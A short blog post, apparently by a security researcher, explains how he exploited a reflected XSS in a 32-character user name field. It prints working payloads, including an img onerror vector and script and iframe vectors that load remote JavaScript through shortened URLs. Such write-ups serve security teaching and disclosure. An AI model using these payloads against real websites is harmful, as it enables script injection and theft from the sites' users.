Tiny XSS exploitation

A well-known website had a limit of 32 chars on the user name field that was reflected in the public profile area.
That field allowed XSS exploitation:

[code lang=”html”]d<img src=x onerror=prompt(1)>[/code]

Simple right?
But sometimes you need to provide a better vector where the affected company can see more than a prompt with a number. Also they know the limitation of their textfield to 32 chars.

I found two methods using SCRIPT and IFRAME.
When I was tring using this with a tiny URL [is.gd] pointing to my XSS code at davidsopas.com I realized that the vector wasn’t executing.
Why? It required HTTPS.

I searched for a tiny url that provided HTTPS and Google provide me with one – goo.gl.

So my final vector was:

[code lang=”html”]<script src=//goo.gl/TJnzmV>
<iframe src=//goo.gl/xWYG4f>[/code]

29 chars and you I could use any Javascript I wanted.
It was fun!

You guys have any other method you like to share?

By David Sopas

-alert(/what/)-

Leave a comment